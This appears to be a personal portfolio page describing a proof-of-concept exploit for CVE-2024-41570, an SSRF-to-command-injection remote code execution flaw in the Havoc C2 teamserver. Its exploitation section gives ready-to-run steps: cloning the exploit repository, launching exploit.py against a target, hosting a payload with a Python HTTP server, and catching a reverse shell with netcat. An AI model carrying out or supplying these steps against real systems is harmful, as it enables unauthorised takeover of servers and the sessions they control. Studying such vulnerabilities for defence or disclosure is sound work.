← Achievements
CVE-2024-41570: Havoc C2 Authenticated RCE via SSRF Chain
TL;DR:
Authenticated Remote Code Execution in Havoc C2 framework by chaining SSRF with command injection to execute arbitrary commands on the teamserver.
Summary
A proof-of-concept exploit for CVE-2024-41570, a Remote Code Execution vulnerability in the Havoc C2 framework. The exploit chains a Server-Side Request Forgery (SSRF) vulnerability to access authenticated endpoints, then leverages a command injection flaw to achieve arbitrary code execution on the teamserver.
CVE ID: CVE-2024-41570
Affected Software: Havoc C2 Framework
Vulnerability Type: SSRF → Authenticated Command Injection → RCE
Attack Chain
SSRF → Authenticated Endpoint Access → Command Injection → Reverse Shell
The SSRF vulnerability allows an attacker to bypass authentication and reach internal endpoints on the teamserver. One of these endpoints is vulnerable to OS command injection, enabling full Remote Code Execution.
Exploitation
Setup
git clone https://github.com/dxlerYT/Havoc-C2-RCE-2024.git
cd Havoc-C2-RCE-2024
Steps
- Edit
payload.shwith the desired reverse shell payload - Launch the exploit targeting the Havoc teamserver:
sudo python3 exploit.py --target https://$IP -i 127.0.0.1 -p 40056
- Host the payload for the target to fetch:
python3 -m http.server 8000
- Catch the reverse shell:
nc -nvlp 4444
Impact
- Full RCE on the teamserver — Execute arbitrary commands as the teamserver process
- Lateral Movement — Pivot from the C2 server to compromised operator workstations and implants
- Campaign Compromise — Take full control of the red team's C2 infrastructure, including all active sessions